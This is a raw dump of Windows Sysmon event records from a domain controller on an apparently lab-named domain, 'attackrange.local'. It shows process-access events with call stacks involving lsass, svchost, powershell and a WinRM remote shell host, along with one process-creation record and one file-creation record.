13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002982Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002981Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002980Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002979Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8576-5FCF-8900-000000009101}4828C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002978Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8576-5FCF-8900-000000009101}4828C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002977Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.279{10ACEC4A-8576-5FCF-8900-000000009101}4828C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8576-5FCF-EBC9-050000000000}0x5c9eb0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002976Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002975Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002974Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002973Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.252{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002972Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.252{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002971Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.252{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002970Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.065{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8575-5FCF-8800-000000009101}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002969Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.065{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8575-5FCF-8800-000000009101}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002968Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.018{10ACEC4A-8575-5FCF-8800-000000009101}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5wrvyr3r.gb4.ps12020-12-08 13:53:58.018 10341000x80000000000000002967Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.002{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8575-5FCF-8800-000000009101}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003135Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8579-5FCF-8F00-000000009101}51081552C:\Windows\system32\conhost.exe{10ACEC4A-8579-5FCF-9300-000000009101}4132C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003134Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003133Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003132Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003131Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003130Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003129Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003128Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003127Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 